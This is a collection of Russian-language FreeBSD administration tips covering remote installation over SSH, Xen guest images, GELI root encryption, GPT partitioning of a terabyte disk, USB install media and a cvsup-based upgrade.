Настраиваем параметры сети для сетевого интерфейса em0 hostname="mfsbsd" defaultrouter="192.168.1.1" ifconfig_em0="inet 192.168.1.5 netmask 255.255.255.0" varmfs="YES" varsize="64m" # Включаем SSH-сервер sshd_enable="YES" Добавляем адрес DNS-сервера: echo "nameserver 8.8.8.8" >resolv.conf Монтируем установочный ISO-образ mdconfig -a -t vnode -f ../../FreeBSD-8.1-RELEASE-amd64-disc1.iso md0 mount_cd9660 /dev/md0 /cdrom/ Собираем загрузочный образ для удаленного сервера: make BASE=/cdrom/8.1-RELEASE/ В результате будет получен файл mfsboot.img, который следует скопировать на удаленный сервер. scp mfsboot.img user@remotehost:~/ Внимание ! Перед манипуляциями с удаленным сервером, рекомендуется обязательно провести эксперимент на локальной машине, повторив на ней все дальнейшие шаги. Заходим на удаленный сервер. Записываем созданный загрузочный образ в начало диска: dd if=mfsboot.img of=/dev/sda bs=1m Перезагружаем сервер: shutdown -r now После перезагрузки заходим на сервер по ssh и запускаем инсталлятор sysinstall. Если возникнут проблемы с созданием устройств в devfs, то разбиваем диск вручную: Пометим системный диск как пустой: dd if=/dev/zero of=/dev/ad0 count=2 Создадим слайс, размером во весь диск с записью загрузочного кода в сектор 0: fdisk -BI /dev/ad0 Создаем стандартную разметку диска и устанавливаем загрузчик: bsdlabel -wB /dev/ad0s1 auto Форматируем разделы: newfs /dev/ad0s1a newfs /dev/ad0s1e newfs /dev/ad0s1d newfs /dev/ad0s1f Создаем точки монтирования: mount /dev/ad0s1a /mnt/ mkdir /mnt/var mkdir /mnt/usr mkdir /mnt/tmp mount /dev/ad0s1d /mnt/var/ mount /dev/ad0s1e /mnt/tmp/ mount /dev/ad0s1f /mnt/usr/ Запускаем sysinstall и выбираем пункт меню "Custom". В пункте Options обязательно меняем значение "Install Root" на /mnt. Далее посещаем раздел "Distributions" и выбираем опцию Minimal. В блоке "Media" выбираем ближайшее ftp-зеркало. Жмем Commit. Копируем созданные для установочного образа настройки сети или устанавливаем параметры в процессе работы sysinstall (не забудьте активировать ssh-сервер): cp /etc/resolv.conf /mnt/etc/ cp /etc/rc.conf /mnt/etc/ Если диск разбивался вручную, после установки необходимо откорректировать fstab. Копируем GENERIC-ядро в директорию /boot/kernel: chroot /mnt cp -Rp /boot/GENERIC/* /boot/kernel Еще раз все проверив перезагружаем сервер.

Установка webOS SDK во FreeBSD (доп. ссылка 1) [комментарии]

Для разработки приложений для сматрфонов Palm Pre и Pixi требуется установка webOS SDK, который поставляется только для Windows, MacOS X и Ubuntu Linux. Ниже представлено руководство по запуску во FreeBSD сборки для Linux, инструкция проверена на SDK версии 1.4.5.465. Устанавливаем следующие порты: archivers/dpkg java/jdk16 java/linux-sun-jdk16 emulators/virtualbox-ose shells/bash Загружаем webOS SDK: 32-разрядные deb-пакеты palm-novacom_1.0.56_i386.deb и palm-sdk_1.4.5-svn307799-sdk1457-pho465_i386.deb. Загрузить. Без установки посмотрим содержимое пакетов при помощи пакетного менеджера dpkg: dpkg --contents palm-novacom_1.0.56_i386.deb dpkg --contents palm-sdk_1.4.5-svn307799-sdk1457-pho465_i386.deb Как видим, содержимое будет установлено в директории /opt и /usr, чтобы не устраивать свалку в системе распакуем содержимое пакетов в отдельную директорию /home/USER/software/palm, а в директории /opt создадим несколько символических ссылок, необходимых для работы программы palm-inspector: mkdir -p ~/software/palm dpkg-deb -x palm-novacom_1.0.56_i386.deb ~/software/palm/ dpkg-deb -x palm-sdk_1.4.5-svn307799-sdk1457-pho465_i386.deb ~/software/palm/ rm -rfv ~/software/palm/usr mv ~/software/palm/opt/* ~/software/palm/ rm -rfv ~/software/palm/opt Правка скриптов для того чтобы они корректно заработали в новом окружении: cd ~/software/palm/PalmSDK/Current/bin В скриптах palm-generate palm-help palm-install palm-launch palm-log palm-package находим блок HERE="$(where_am_i "$0")" # look for relative dirs JARS_DIR="$(abs_path "$HERE/../share/jars") и заменяем его на HERE="$(dirname `realpath "$0"`)" # look for relative dirs JARS_DIR="$HERE/../share/jars" В скрипте palm-emulator дополнительно заменяем строку IMAGES_DIR="$(abs_path "$HERE/../share/emulator/images")" на IMAGES_DIR="$HERE/../share/emulator/images" и добавляем export JAVA_HOME=/usr/local/linux-sun-jdk1.6.0 после строки set -e Для корректного вызова bash заменяем заголовок #!/bin/bash на #!/usr/bin/env bash В скрипте palm-worm заменяем # remove the trailing slash (if any) SDK_DIR=${PalmSDK%/} на # remove the trailing slash (if any) SDK_DIR="$(dirname `realpath "$0"`)/../" Для удобства использования устанавливаем символические ссылки на скрипты в базовую директорию: cd ~/software/palm ln -s PalmSDK/Current/bin/palm-* . Обеспечиваем работоспособность прокси-сервиса Novacom, позволяющего устанавливать, запускать и инспектировать приложения виртуальном окружении VirtualBox или на подсоединенном телефоне. Устанавливаем необходимый для запуска Novacom пакет libusb-0.1-4_0.1.12-14_i386.deb из репозитория Ubuntu: dpkg-deb -x libusb-0.1-4_0.1.12-14_i386.deb tmp mv tmp/lib/* ~/software/palm/PalmSDK/Current/lib/ rm -rfv tmp Создаем простые скрипты-врапперы для запуска программ с учетом измененного пути к библиотекам: novacom.sh: #!/bin/sh CURDIR="$(dirname `realpath "$0"`)" export LD_LIBRARY_PATH=$CURDIR/PalmSDK/Current/lib:"$LD_LIBRARY_PATH" cd $CURDIR && exec ./Palm/novacom/novacom $* novacomd.sh #!/bin/sh CURDIR="$(dirname `realpath "$0"`)" export LD_LIBRARY_PATH=$CURDIR/PalmSDK/Current/lib:"$LD_LIBRARY_PATH" cd $CURDIR && exec ./Palm/novacom/novacomd $* novaterm.sh #!/bin/sh CURDIR="$(dirname `realpath "$0"`)" export LD_LIBRARY_PATH=$CURDIR/PalmSDK/Current/lib:"$LD_LIBRARY_PATH" cd $CURDIR && exec ./Palm/novacom/novacom $* -t open tty://0 Обеспечиваем функционирование Palminspector, программы для отладки и инспектирования web-приложений для webOS. Программа базируется на движке WebKit и требует для своей работы установку следующих пакетов из репозитория Ubuntu: libenchant1c2a_1.6.0-0ubuntu1_i386.deb libfam0_2.7.0-16.1_i386.deb libgcrypt11_1.4.4-5ubuntu2_i386.deb libgio-fam_2.22.0-0ubuntu1_i386.deb libgnutls13_2.0.4-1ubuntu2.6_i386.deb libgpg-error0_1.6-1ubuntu2_i386.deb libicu38_3.8-6ubuntu0.2_i386.deb libtasn1-3_2.4-1_i386.deb libxml2_2.7.6.dfsg-1ubuntu1_i386.deb Распаковываем данные пакеты: dpkg-deb x libenchant1c2a_1.6.0-0ubuntu1_i386.deb tmp mv tmp/usr/lib/* ~/software/palm/PalmSDK/Current/lib/ dpkg-deb -x libxml2_2.7.6.dfsg-1ubuntu1_i386.deb tmp mv tmp/usr/lib/* ~/software/palm/PalmSDK/Current/lib/ dpkg-deb -x libicu38_3.8-6ubuntu0.2_i386.deb tmp mv tmp/usr/lib/* ~/software/palm/PalmSDK/Current/lib/ dpkg-deb -x libgnutls13_2.0.4-1ubuntu2.6_i386.deb tmp mv tmp/usr/lib/* ~/software/palm/PalmSDK/Current/lib/ dpkg-deb -x libgcrypt11_1.4.4-5ubuntu2_i386.deb tmp mv tmp/lib/* ~/software/palm/PalmSDK/Current/lib/ dpkg-deb -x libtasn1-3_2.4-1_i386.deb tmp mv tmp/usr/lib/* ~/software/palm/PalmSDK/Current/lib/ dpkg-deb -x libgpg-error0_1.6-1ubuntu2_i386.deb tmp mv tmp/lib/* ~/software/palm/PalmSDK/Current/lib/ dpkg-deb -x libgio-fam_2.22.0-0ubuntu1_i386.deb tmp mv tmp/usr/lib/gio ~/software/palm/PalmSDK/Current/lib/ dpkg-deb -x libfam0_2.7.0-16.1_i386.deb tmp mv tmp/usr/lib/* ~/software/palm/PalmSDK/Current/lib/ Создаем скрипт-враппер palminspector.sh: #!/bin/sh CURDIR="$(dirname `realpath "$0"`)" export LD_LIBRARY_PATH=$CURDIR/PalmSDK/Current/lib:"$LD_LIBRARY_PATH" cd $CURDIR && exec ./PalmSDK/Current/bin/palminspector $* Решаем проблемы с путями к SDK, которые жестко прошиты в бинарном файле, установкой символической ссылки в директории /opt: ln -s /home/USER/software/palm/PalmSDK /opt/PalmSDK Настраиваем образ виртуальной машины для VirtualBox, для этого устанавливаем порт emulators/virtualbox-ose и запускаем palm-emulator для эмуляции телефонов Palm Pre и Palm Pixi. В процессе запуска не обращаем внимание на предупреждение "Novacom not responding".

Подготовка паравиртуализированного гостевого окружения с FreeBSD 8 для Xen (доп. ссылка 1) (доп. ссылка 2) (доп. ссылка 3) [комментарии]

В заметке рассказано о подготовке образа гостевой системы с FreeBSD 8, предназначенного для работы под управлением Xen в режиме паравиртуализации, позволяющем добиться более высокой производительности по сравнению с HVM-режимом (полная аппаратная виртуализация). В настоящее время нет готовых бинарных образов ядра и системы, предназначенных для установки в роли гостевой ОС. Придется создавать их вручную. Для начала поставим FreeBSD обычным образом на диск или под управлением VirtualBox, после чего займемся созданием образа, пригодного для использования в Xen DomU. Создадим каркас будущего образа гостевой ОС (размер можно сразу изменить исходя из решаемых задач): # truncate -s 256M freebsd.img Привяжем к этому файлу виртуальный диск: # mdconfig -f freebsd.img Установим загрузчик, создадим дисковые разделы и отформатируем под UFS2 с включенными softupdates: # fdisk -BI md0 # bsdlabel -wB md0s1 # newfs -U md0s1a Монтируем локально созданную внутри файла ФС: # mount /dev/md0s1a /mnt В /usr/src текущей системы должен быть полный набор исходных текстов, обновим их: # csup -h cvsup2.ru.FreeBSD.org -L 2 /usr/share/examples/cvsup/standard-supfile Примечание: C 2012 года проект FreeBSD перешёл на использование Subversion. Вместо cvsup следует использовать svnup (или freebsd-update для системы, portsnap/pkg для портов): cd /usr/ports/net/svnup && make install svnup stable -h svn0.us-west.freebsd.org svnup ports -h svn0.us-west.freebsd.org Соберем ядро и мир # make buildworld && make buildkernel KERNCONF=XEN Установим итоговые собранные файлы на ранее подготовленный дисковый образ в файле, примонтированный в /mnt: # export DESTDIR=/mnt && make installworld && make installkernel KERNCONF=XEN && cd etc && make distribution Адаптируем настройки для работы в качестве гостевой системы Xen. В /mnt/etc/fstab добавим: /dev/xbd0 / ufs rw 1 1 В /mnt/etc/ttys: xc0 "/usr/libexec/getty Pc" vt100 on secure Сохраним отдельно ядро гостевой системы, так как его потребуется скопировать для загрузки из dom0: # cp /mnt/boot/kernel/kernel /some/place/freebsd-kernel Отмонтируем виртуальный диск: # umount /mnt # mdconfig -d -u md0 В результате получены файл с гостевой системой freebsd.img и файл с ядром freebsd-kernel. Конфигурируем управляющее окружение Xen (dom0): Проверяем работает ли xen: # xm list Создаем файл конфигурации /etc/xen/freebsd: kernel = "/virt/freebsd-8.0p2-i386-xen-domu-kernel" memory = 512 name = "freebsd" vif = [ '' ] disk = [ 'file:/virt/freebsd-8.0p2-i386-xen-domu.img,hda,w' ] extra = "boot_verbose=1" extra += ",vfs.root.mountfrom=ufs:/dev/ad0s1a" extra += ",kern.hz=100" где, /virt/freebsd-8.0p2-i386-xen-domu-kernel путь к предварительно скопированному в файловую систему dom0 подготовленного ранее ядра FreeBSD. В /etc/xen/xend-config.sxp активируем сетевой мост для работы сети внутри FreeBSD: #(network-script network-dummy) (network-script network-bridge) Запускаем гостевое окружение и сразу входим в консоль: # xm create freebsd # xm console freebsd Из проблем, отмечена неработа настройки ifconfig_xn0="DHCP", для получения адреса dhclient нужно запускать вручную.

Как посмотреть список установленных во FreeBSD портов [обсудить]

Утилита pkg_info показывает список установленных пакетов с учетом номера версии, чтобы сформировать список общих названий портов, которые нужно установить для повторения списка программ на другой машине можно использовать скрипт: find /var/db/pkg -name +CONTENTS -exec sh -c "grep 'comment ORIGIN' {}" \;|cut -d\: -f2

Удалённая установка FreeBSD на сервер с установленным Linux Автор: Touch [комментарии]

Для удаленной установки FreeBSD из Linux уже есть готовый инструмент который называется Depenguinator. Причины по которым это делается обсуждать не буду, вообщем имеем сервер с установленным GNU Linux. Cкачать Depenguinator можно здесь: http://www.daemonology.net/blog/2008-01-29-depenguinator-2.0.html Сам собирал всё это на своей машине под Gentoo, поэтому для сборки пришлось поставить app-arch/libarchive Возможно кому-то прийдётся поставить что-то ещё. Скачиваем и распаковываем сам depenguinator: # wget -c http://www.daemonology.net/depenguinator/depenguin-2.0.tar.gz # tar -xzpvf depenguin-2.0.tar.gz Выполняем всё под root'ом, потому как под пользователем не соберётся Переходим в depenguin-2.0, распаковываем makefs-20080113.tar.gz и выполняем: # sed -i'' -e'140i\#define ARG_MAX 2048' makefs-2008011/netbsdsrc/lib/libc/gen/glob.c Потому как версия glibc у нас новее чем у автора из-за чего нормально оно не собирается, после чего запаковываем всё назад в архив с таким же названием. Правим depenguinator.conf и готовим authorized_keys для чего выполняем # ssh-keygen -t rsa && cp ~/.ssh/id_rsa.pub authorized_keys Правим loader.conf, добавляем поддержку ext2fs, grub я решил оставить, он и под freebsd работает, а так как grub.conf у нас находится на разедле с ext2 было бы неплохо иметь возможность его исправить загрузившись во freebsd. # echo 'ext2fs_load="YES"' >> loader.conf Собираем загрузочный образ depenguinator'а # ./makeimage.sh ~/7.2-RELEASE-i386-disc1.iso 7.2-RELEASE authorized_keys После сборки должен получится disk.img который нужно будет загрузить а сервер. Для загрузки Depenguinator'а будем использовать swap, для чего меняем его тип fdisk'ом на a5. Накатываем образ # dd if=disk.img of=/dev/sda2 Правим grub.conf, для загрузки Depenguinator'а title Depenguinator root (hd0,1) makeactive chainloader +1 После чего меняем умолчательную загрузку на Depenguinator и затаив дыхание перегружаемся :) Если всё прошло нормально то после перезагрузки мы должны получить ssh с доступом по ключу, который мы создавали. Готовим диск и монтируем нашу будущую систему в /mnt. Если у нас на сервере всего один жёсткий диск - оставляем Linux'овый /boot и swap который мы используем под Depenguinator, осталные разделы удаляем и вместо них создаём slice для FreeBSD. Если же дисков несколько, например имеем software'ный raid можно извлечь из него один винчестер и полностью использовать для FreeBSD. В результате получим возможность загрузки GNU Linux, Depenguinator и FreeBSD. Так как сервер у меня новый то ставить на него решил 7.2-RELEASE-amd64, для чего копируем по ssh с первого диска base и kernels: # scp -r base kernels 1.1.1.1:/mnt/usr Устанавливаем базовую систему: # cd /mnt/usr/base && cat base.?? | tar --unlink -xpzf - -C /mnt # cd /mnt/usr/kernels && cat generic.?? | tar --unlink -xpzf - -C /mnt/boot # cd /mnt/boot; rmdir /mnt/boot/kernel; mv /mnt/boot/GENERIC /mnt/boot/kernel Редактируем /mnt/boot/loader.conf, добавляем ext2fs_load="YES" Редактируем /mnt/etc/fstab под свои разделы. Редактируем /mnt/etc/rc.conf, добавляем имя хоста, настройки сети и т.д. Редактируем /mnt/etc/ssh/sshd_config ставим PermitRootLogin yes Копируем ключ для доступа по ssh # mkdir /mnt/root/.ssh && cp /root/.ssh/authorized_keys /mnt/root/.ssh Монтируем boot'овый раздел linux'а и снова правим grub.conf, теперь добавляем загрузку уже новой системы: title FreeBSD root (hd0,2,a) kernel /boot/loader Снова меняем умолчательную загрузку но уже на FreeBSD и снова затаив дыхание перегружаемся :) После перезагрузки мы должны получить доступ по ssh с авторизацией по ключу. Советую для начала всё это проделать на виртуалке, ну или на компьютере стоящем рядом :) Если что-то не получилось, дополнительную информацию можно найти здесь: http://daemonicdispatches.disqus.com/the_depenguinator_version_20/ http://stderr.de/blog/bryar.cgi/id_2625 http://gist.github.com/45741

Создание установочного USB Flash с FreeBSD 8.0 (доп. ссылка 1) [комментарии]

1. Чистим MBR и таблицу разделов на Flash: dd if=/dev/zero of=/dev/da0 bs=1k count=1 2. Делаем Flash загрузочным: bsdlabel -Bw da0 auto 3. Создаем файловую систему UFS2 с GEOM меткой "FreeBSD" newfs -L FreeBSD /dev/da0a 4. Монтируем в /mnt/iso установочный ISO-образ: mdconfig -a -t vnode -f 8.0-HEAD-20090609-JPSNAP-i386-dvd1 -u 0 mount -r -t cd9660 /dev/md0 /mnt/iso 5. Монтируем USB Flash: mount /dev/da0a /mnt/USB-Stick 6. Копируем все файлы с iso на USB. tar cf - /mnt/iso | tar xf - -C /mnt/USB-Stick 7. Редактируем /mnt/USB-Stick/etc/fstab и добавляем /dev/ufs/FreeBSD / ufs ro 0 0 8. Отмонтируем Flash и iso umount /mnt/USB-Stick umount /mnt/iso

Настройка работы шифрованного корневого раздела во FreeBSD (доп. ссылка 1) [комментарии]

Устанавливаем систему стандартным образом в один минимальный корневой раздел, для дополнительных разделов создаем фиктивные точки монтирования. Таблица разделов имеет примерно такой вид: ad4s1a / 256M ad4s1b swap ad4s1d /new-root ad4s1e /new-tmp ad4s1f /new-var ad4s1g /new-usr Загружаемся в установленную систему. В /boot/loader.conf добавляем geom_eli_load="YES" Отмонтируем раздел /new-root, который будет содержать новый шифрованный корень: umount /new-root Инициализируем шифрование будущего корня и форматируем раздел: geli init -b -l 256 /dev/ad4s1d geli attach /dev/ad4s1d newfs -L root /dev/ad4s1d.eli В /etc/fstab меняем /dev/ad4s1d на /dev/ad4s1d.eli Монтируем шифрованный раздел: mount /new-root Создаем ключи для шифрования остальных разделов, заполнив их случайными данными: dd if=/dev/random of=/new-root/ad4s1e.key bs=512 count=1 dd if=/dev/random of=/new-root/ad4s1f.key bs=512 count=1 dd if=/dev/random of=/new-root/ad4s1g.key bs=512 count=1 Отключаем активный раздел подкачки и шифруем его: swapoff -a geli onetime -l 256 -s 4096 /dev/ad4s1b В /etc/fstab меняем для раздела подкачки /dev/ad4s1b на /dev/ad4s1b.eli Активируем раздел подкачки: swapon -a Готовим шифрованные разделы tmp, var и usr: umount /new-tmp umount /new-var umount /new-usr geli init -K /new-root/ad4s1e.key -l 256 -P /dev/ad4s1e geli init -K /new-root/ad4s1f.key -l 256 -P /dev/ad4s1f geli init -K /new-root/ad4s1g.key -l 256 -P /dev/ad4s1g geli attach -k /new-root/ad4s1e.key -p /dev/ad4s1e geli attach -k /new-root/ad4s1f.key -p /dev/ad4s1f geli attach -k /new-root/ad4s1g.key -p /dev/ad4s1g newfs -L tmp /dev/ad4s1e.eli newfs -L var /dev/ad4s1f.eli newfs -L usr /dev/ad4s1g.eli Формируем будущий образ иерархии монтирования разделов: cd /new-root mkdir tmp mkdir var mkdir usr mount /dev/ad4s1e.eli tmp/ mount /dev/ad4s1f.eli var/ mount /dev/ad4s1g.eli usr/ Монтируем установочный диск с FreeBSD и копируем с него в новый корень образ базовой системы: mount /cdrom cd /cdrom/6.2-RELEASE/base cat base.?? | tar --unlink -xpzf - -C /new-root/ Другой вариант скопировать уже установленный корень: tar -cf - / --exclude /new-root | tar -xf - -C /new-root Подготавливаем новый корень к загрузке: mkdir /new-root/mnt/boot cp /etc/fstab /new-root/etc/fstab В /new-root/etc/fstab добавляем разделы для монтирования: /dev/ad4s1a /mnt/boot ufs rw 1 1 /dev/ad4s1e.eli / ufs rw 1 1 /dev/ad4s1d.eli /tmp ufs rw 1 1 /dev/ad4s1g.eli /usr ufs rw 1 1 /dev/ad4s1f.eli /var ufs rw 1 1 В /new-root/etc/rc.conf определяем монтирование дополнительных шифрованных разделов: geli_devices="ad4s1e ad4s1f ad4s1g" geli_ad4s1e_flags="-p -k /ad4s1e.key" geli_ad4s1f_flags="-p -k /ad4s1f.key" geli_ad4s1g_flags="-p -k /ad4s1g.key" Из старого корня делаем минимальный загрузочный раздел /mnt/boot, в /etc/fstab оставляем: /dev/ad4s1d.eli / ufs rw 1 1 Перезагружаемся, чистим содержимое /mnt/boot, оставив только /mnt/boot/boot/* и /mnt/boot/etc/fstab

Инсталляция FreeBSD 7.2 с USB Flash из-за проблем с загрузкой установочного CD [комментарии]

К сожалению релиз FreeBSD 7.2 вышел (http://www.freebsd.org/releases/7.2R/errata.html) с неработающим на некоторых системах загрузочным образом. Если при попытке загрузки с disc1 (i386) система игнорирует его, можно произвести установку с "dvd1" или попробовать загрузиться с образов "bootonly" или "livefs", а затем, после загрузки, подменить CD в приводе на "disc1", перед стартом инсталлятора sysinstall, или предварительно скопировать содержимое диска на USB Flash и выбрать его в качестве источника. Другой вариант - подготовить установочный USB Flash диск. Самый простой способ, сперва на другой машине установить FreeBSD на Flash стандартным способом, как на жесткий диск. Flash накопитель должен отобразиться в списке дисков как /dev/da0, если этого не произошло, можно попробовать перейти в shell (Alt-F4) и загрузить модуль ядра da: kldload da camcontrol rescan all Далее загружаемся с созданного Flash и копируем на него содержимое установочного диска. После чего диск можно использовать на машинах без CD-привода, вручную запуская /stand/sysinstall и выбирая в качестве источника установки локальное хранилище.

Установка FreeBSD на embedded ПК без монитора и клавиатуры (доп. ссылка 1) Автор: Анонимус [комментарии]

Есть железка с x86 процессором, 256 Мб памяти, 3 eth от via и слотом под CF-карту. Нет VGA выхода и клавиатурной ps/2, есть COM. Необходимо завести на этой железяке FreeBSD в качестве роутера: 1) Цепляем CF-карту через USB кардридер к компьютеру, загружаемся с установочного CD, выбираем в качестве целевого диска "da" - так у меня определился USB кардридер. Разбиваем по вкусу, необходимости и возможностям флешки. Через инсталлятор рекомендую сразу включить sshd и завести учётную запись. 2) Загружаемся на этом же компьютере с кардридера. Прописываем /etc/rc.conf необходимую сеть (внимание! учитывая название драйвера сетевой карты embeded устройства, а не ПК с которого производилась установка), например ifconfig_vr0="inet 192.168.1.6 netmask 255.255.255.0" Так же правим /etc/fstab на целевой диск, на моём устройстве CF-карта будет ad0, вместо da1 кардридера. Правим чтобы по умолчанию консоль (видео/клавиатура) была на com-порту, в процессе загрузки: echo "-h" > /boot.config echo 'console="comconsole"' >> /boot/loader.conf и на ходу - в /etc/tty заменить/добавить: ttyd0 "/usr/libexec/getty std.9600" vt100 on secure 3) Цепляем карту к устройству, подключаем консольный кабель в COM порт, включаем питание и с помощью консольного терминала типа HyperTerminal, putty, TeraTerm, cu, minicom и т.п. с настройками 9600, 8-N-1 видим процесс загрузки FreeBSD, можем в него вмешаться и после загрузки видим стандартное приглашение. Тут же не возбраняется получить управление по ssh, если всё верно прописали в rc.conf. Дополнения: - не плохо бы пересобрать ядро, можно выкинуть всё что касается vga, sc и kbd и многое другое (зависит от железки). Удалив потом исходные тексты, obj и т.п., получим мегабайт 150, а то и меньше, на флешке и сравнительно не много расходуемой ядром памяти при полнофункциональной FreeBSD; - в принципе, можно и без sysinstall, поставить и сразу с пересобранным ядром, в качестве примера гуглите "freebsd on usb stick" и делайте по аналогии; - Если железок много то логично сделать раз, а потом скопировать при помощи dd; - На флешку много писать накладно, посему не плохо вытащить /tmp и некоторые части /var в tmpfs или сеть.

Установка FreeBSD на терабайтный диск с которым не работал sysinstall (доп. ссылка 1) Автор: penkovmm [комментарии]

Решение проблемы с неправильной геометрией диска при попытке поставить FreeBSD на жёсткий диск, на который не получалось поставить систему штатной утилитой sysinstall. При переносе системы на терабайтник и написании статьи использовались материалы по следующим ссылкам: http://m8d.de/news/freebsd-on-gpt.php http://www.lissyara.su/?id=1704 Возникла у меня как-то необходимость заменить в домашнем сервере, который работает под управлением ОС FreeBSD 7.1 Release, жёсткий диск Samsung SP0411N (40GB, IDE) на Seagate ST31000333AS (1TB, SATAII). Материнская плата, установленная на сервере - Asus P5V800-MX (чипсет VIA), поддерживает HDD IDE, SATA и SATAII. Не долго думая, отключил старый винт, подсоединил новый, вставил в привод DVD с FreeBSD, запустил установку и... столкнулся с сообщением об ошибке от утилиты fdisk, которой показалось, что диск имеет неправильную геометрию. Для меня так и осталось загадкой, что же не понравилось этой утилите в моём новом HDD. Судя по хэндбуку, ОС должна нормально работать с разделами до 2TB. Позадавав вопросы на разнообразных форумах, решил попробовать использовать GPT. Итак, к делу: 1. Подготовка Загружаюсь со старого диска, на который установлена FreeBSD 7.1 Release при подключенном новом терабайтнике. У меня в ядре уже была включена поддержка GPT, но перед работой проверьте в конфигурации ядра наличие строчки options GEOM_GPT терабайтник у меня определился как ad4 (а как определился Ваш, можно посмотреть в файле /var/run/dmesg.boot). 2. Создаю схему разметки GPT Зашёл под рутом и дал команду gpart create -s GPT ad4 Этой командой я создал схему разметки GPT на провайдере, а провайдером в данном случае выступает ad4, то есть мой новый диск. Теперь я дам команду gpart show, которая покажет информацию о GPT в системе, в моём случае покажет, что диск свободен, начинается с 34 и имеет размером какое-то страшное число логических блоков, которое тут же и в Гб указывается. В процессе разметки диска я буду эту команду постоянно использовать, так что будьте готовы. 3. Создаю разделы Теперь создам загрузочный раздел: gpart add -b 34 -s 16 -t freebsd-boot ad4 эта команда создала раздел, начиная с логического блока 34, размером в 16 логических блоков, имеющий тип freebsd-boot и размещающийся на ad4, только ad4 в документации теперь называется не "провайдер", а уже Geom. Создаем остальные разделы: gpart add -b 50 -s 2097152 -t freebsd-ufs ad4 этой командой я создал раздел для корневой файловой системы размером в 1 Гб, то есть раздел начинается с логического блока 50 и занимает 2097152 логических блока. Число, с которого должен начинаться следующий раздел берём из вывода команды gpart show (просто смотрим там, с какого блока начинается свободное место), а сколько блоков надо на один Гб, я выяснил, разделив количество блоков на количество Гб на диске (эти данные тоже можно посмотреть в выводе команды gpart show). gpart add -b 2097202 -s 8388608 -t freebsd-swap ad4 это 4 Гб под swap (объём свопа я задал, умножив количество имеющейся у меня в сервере оперативки на 2). gpart add -b 10485810 -s 8388608 -t freebsd-ufs ad4 это 4 Гб под /tmp - с большим запасом. Я запасливый. gpart add -b 18874418 -s 20971520 -t freebsd-ufs ad4 это 10 Гб под /var на случай разрастания логов. gpart add -b 39845938 -s 1913679197 -t freebsd-ufs ad4 и всё остальное под /usr. После этих манипуляций вывод команды gpart show у меня стал такой: => 34 1953525101 ad4 GPT (932G) 34 16 1 freebsd-boot (8.0K) 50 2097152 2 freebsd-ufs (1.0G) 2097202 8388608 3 freebsd-swap (4.0G) 10485810 8388608 4 freebsd-ufs (4.0G) 18874418 20971520 5 freebsd-ufs (10G) 39845938 1913679197 6 freebsd-ufs (913G) То есть я получил такое размещение разделов на диске: Раздел Тип Размер Файловая система ad4p1 freebsd-boot 8KB - ad4p2 freebsd-ufs 1GB / ad4p3 freebsd-swap 4GB /swap ad4p4 freebsd-ufs 4GB /tmp ad4p5 freebsd-ufs 10GB /var ad4p6 freebsd-ufs 913GB /usr 4. Делаю диск загрузочным gpart bootcode -b /dist/boot/pmbr ad4 И запишу загрузочный код в загрузочный сектор: gpart bootcode -p /boot/gptboot -i 1 ad4 Другой вариант записи: cp /boot/gptboot /tmp dd if=/dev/zero bs=641 count=1 >> /tmp/gptboot dd if=/tmp/gptboot of=/dev/ad4p1 bs=512 5. Инициализирую разделы Дальше созданные разделы необходимо подготовить для работы, то есть проинициализировать. Итак, команды: newfs -O2 /dev/ad4p2 (12) newfs -O2 -U /dev/ad4p4 (13) newfs -O2 -U /dev/ad4p5 (14) newfs -O2 -U /dev/ad4p6 (15) P.S. Хочу отметить, что вместо команды gpart на ранних версиях FreeBSD можно было воспользоваться командой gpt, однако во FreeBSD 8.0 команды gpt нет. 6. Переношу систему на новый жёсткий диск В качестве подготовки к переносу создал каталоги /mnt/root, /mnt/var и /mnt/usr: mkdir /mnt/root; mkdir /mnt/var; mkdir /mnt/usr (16) смонтировал туда новые разделы: mount /dev/ad4p2 /mnt/root mount /dev/ad4p5 /mnt/var mount /dev/ad4p6 /mnt/usr И непосредственно перенос системы: cd /; pax -p eme -X -rw . /mnt/root (20) cd /var; pax -p eme -X -rw . /mnt/var (21) cd /usr; pax -p eme -X -rw . /mnt/usr (22) Теперь редактирую файл /etc/fstab (на новом диске названия разделов не те, что на старом, так что система при загрузке с терабайтника попытается смонтировать те разделы, которые были на старом диске. У меня получился вот такой файл: # Device Mountpoint FStype Options Dump Pass# /dev/ad4p3 none swap sw 0 0 /dev/ad4p2 / ufs rw 1 1 /dev/ad4p4 /tmp ufs rw 2 2 /dev/ad4p6 /usr ufs rw 2 2 /dev/ad4p5 /var ufs rw 2 2 /dev/acd0 /cdrom cd9660 ro,noauto 0 0 Выключаю сервер командой shutdown -p now и отключаю старый диск. 7. Заключение После включения у меня всё заработало как надо, кроме mysql, потому что его сокет лежал в /tmp, а во время переноса на директорию /tmp изменились права. Починил командой chmod 1777 /tmp Ну и всё. Удачи!

Обновление FreeBSD 7.0 до FreeBSD 7.1 через cvsup (доп. ссылка 1) Автор: Litos [комментарии]

sed 's/RELENG_7_0/RELENG_7_1/' < /usr/share/examples/cvsup/standard-supfile > supfile csup -h cvsup2.ru.FreeBSD.org supfile cd /usr/src make buildworld make buildkernel KERNCONF=MY make installkernel KERNCONF=MY make installworld tar czvf /root/etc-backup.tgz /etc /var/named/etc mergemaster reboot Инструкция по обновлению при помощи freebsd-update: https://www.opennet.ru/tips/info/1818.shtml Дополнение: C 2012 года проект FreeBSD перешёл на использование Subversion. Вместо cvsup следует использовать svnup (или freebsd-update для системы, portsnap/pkg для портов): cd /usr/ports/net/svnup && make install svnup stable -h svn0.us-west.freebsd.org svnup ports -h svn0.us-west.freebsd.org Настройки можно найти в файле /usr/local/etc/svnup.conf

Установка FreeBSD на USB Flash. (доп. ссылка 1) Автор: iZEN [комментарии]

